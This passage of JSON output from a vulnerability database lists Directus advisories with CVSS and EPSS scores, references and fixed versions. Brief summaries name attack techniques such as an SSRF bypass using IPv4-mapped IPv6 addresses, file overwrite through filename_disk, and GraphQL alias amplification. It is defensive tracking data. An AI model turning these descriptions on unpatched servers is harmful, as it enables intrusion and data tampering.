This vulnerability is fixed in 11.16.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35413","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04912","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04908","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35413"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35413","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35413"},{"reference_url":"https://github.com/advisories/GHSA-wxwm-3fxv-mrvx","reference_id":"GHSA-wxwm-3fxv-mrvx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wxwm-3fxv-mrvx"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx","reference_id":"GHSA-wxwm-3fxv-mrvx","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:05:28Z/"}],"url":"https://github.
com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373399?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35413","GHSA-wxwm-3fxv-mrvx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9dsr-kz3s-hkdx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/105805?format=json","vulnerability_id":"VCID-9r91-qgfa-x7ak","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.12.0 and prior to version 11.9.0, Directus Flows with a manual trigger are not validating whether the user triggering the Flow has permissions to the items provided as payload to the Flow. Depending on what the Flow is set up to do this can lead to the Flow executing potential tasks on the attacker's behalf without authenticating. Bad actors could execute the manual trigger Flows without authentication, or access rights to the said collection(s) or item(s). Users with manual trigger Flows configured are impacted as these endpoints do not currently validate if the user has read access to `directus_flows` or to the relevant collection/items. The manual trigger Flows should have tighter security requirements as compared to webhook Flows where users are expected to perform do their own checks. Version 11.9.0 fixes the issue. 
As a workaround, implement permission checks for read access to Flows and read access to relevant collection/items.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53889","reference_id":"","reference_type":"","scores":[{"value":"0.00244","scoring_system":"epss","scoring_elements":"0.47989","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00244","scoring_system":"epss","scoring_elements":"0.48128","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53889"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53889","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53889"},{"reference_url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb","reference_id":"22be460c76957708d67fdd52846a9ad1cbb083fb","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb"},{"reference_url":"https://github.com/advisories/GHSA-7cvf-pxgp-42fc","reference_id":"GHSA-7cvf-pxgp-42fc","reference_type":"","scores":[],"url":"https://github.com/adv
isories/GHSA-7cvf-pxgp-42fc"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc","reference_id":"GHSA-7cvf-pxgp-42fc","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"v11.9.0","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/378353?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"reso
urce_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53889","GHSA-7cvf-pxgp-42fc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9r91-qgfa-x7ak"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/145589?format=json","vulnerability_id":"VCID-9t8b-59vc-kbea","summary":"Directus is a real-time API and App dashboard for managing SQL database content. In versions prior to 9.16.0, users with read access to the `password` field in `directus_users` can extract the argon2 password hashes by brute forcing the export functionality combined with a `_starts_with` filter. This allows the user to enumerate the password hashes. Accounts cannot be taken over unless the hashes can be reversed, which is unlikely with current hardware. This problem has been patched in version 9.16.0 by preventing any hashed/concealed field from being filtered against with the `_starts_with` or other string operators. Users are advised to upgrade. 
Users unable to upgrade may mitigate this issue by ensuring that no user has `read` access to the `password` field in `directus_users`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27481","reference_id":"","reference_type":"","scores":[{"value":"0.00301","scoring_system":"epss","scoring_elements":"0.53838","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00301","scoring_system":"epss","scoring_elements":"0.53964","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27481"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27481","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27481"},{"reference_url":"https://github.com/directus/directus/pull/14829","reference_id":"14829","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/pull/14829"},{"reference_url":"https://github.com/directus/directus/pull/15010","reference_id":"15010","reference_type":"","scores":[{"value":"4.3","scoring_sy
stem":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/pull/15010"},{"reference_url":"https://github.com/advisories/GHSA-m5q3-8wgf-x8xf","reference_id":"GHSA-m5q3-8wgf-x8xf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m5q3-8wgf-x8xf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf","reference_id":"GHSA-m5q3-8wgf-x8xf","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/381015?format=json","purl":"pkg:npm/directus@9.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},
{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-bsua-aktm-1qfd"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u121-7x5t-3fcg"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.16.0"}],"aliases":["CVE-2023-27481","GHSA-m5q3-8wgf-x8xf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9t8b-59vc-kbea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/73167?format=json","vulnerability_id":"VCID-a1y7-cmk1-4ffn","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, the PATCH /files/{id} endpoint accepts a user-controlled filename_disk parameter. 
By setting this value to match the storage path of another user's file, an attacker can overwrite that file's content while manipulating metadata fields such as uploaded_by to obscure the tampering. This vulnerability is fixed in 11.17.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39942","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12266","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12358","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39942"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39942","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39942"},{"reference_url":"https://github.com/advisories/GHSA-393c-p46r-7c95","reference_id":"GHSA-393c-p46r-7c95","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-393c-p46r-7c95"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95","reference_id":"GHSA-393c-p46r-7c95","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generi
c_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.17.0","reference_id":"v11.17.0","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.17.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-39942","GHSA-393c-p46r-7c95"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a1y7-cmk1-4ffn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71560?format=json","vulnerability_id":"VCID-ah8z-vr21-wfd6","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.0, a Server-Side Request Forgery (SSRF) protection bypass has been identified and fixed in Directus. The IP address validation mechanism used to block requests to local and private networks could be circumvented using IPv4-Mapped IPv6 address notation. 
This vulnerability is fixed in 11.16.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35409","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02712","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02707","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35409"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35409","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35409"},{"reference_url":"https://github.com/advisories/GHSA-wv3h-5fx7-966h","reference_id":"GHSA-wv3h-5fx7-966h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wv3h-5fx7-966h"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h","reference_id":"GHSA-wv3h-5fx7-966h","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:04:19Z/"}],"url":"https://github.com/directus/directu
s/security/advisories/GHSA-wv3h-5fx7-966h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373510?format=json","purl":"pkg:npm/directus@11.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.0"}],"aliases":["CVE-2026-35409","GHSA-wv3h-5fx7-966h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ah8z-vr21-wfd6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/134660?format=json","vulnerability_id":"VCID-b8ya-2bmn-e3h5","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.23.3, the `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission. 
This issue is patched in version 9.23.3.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-28443","reference_id":"","reference_type":"","scores":[{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19287","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19457","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-28443"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-28443","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-28443"},{"reference_url":"https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc","reference_id":"349536303983ccba68ecb3e4fb35315424011afc","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc"},{"reference_url":"https://github.com/advisories/GHSA-8vg2-wf3q-mwv7","reference_id":"GHSA-8vg2-wf3q-mwv7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advis
ories/GHSA-8vg2-wf3q-mwv7"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7","reference_id":"GHSA-8vg2-wf3q-mwv7","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7"},{"reference_url":"https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13","reference_id":"logger.ts#L13","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/380863?format=json","purl":"pkg:npm/directus@9.23.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b
3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-f3pv-2cf5-3bg8"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.3"}],"aliases":["CVE-2023-28443","GHSA-8vg2-wf3q-mwv7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-b8ya-2bmn-e3h5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71751?format=json","vulnerability_id":"VCID-bc42-4j4d-tudj","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus' GraphQL endpoints (/graphql and /graphql/system) did not deduplicate resolver invocations within a single request. An authenticated user could exploit GraphQL aliasing to repeat an expensive relational query many times in a single request, forcing the server to execute a large number of independent complex database queries concurrently, multiplying database load linearly with the number of aliases. 
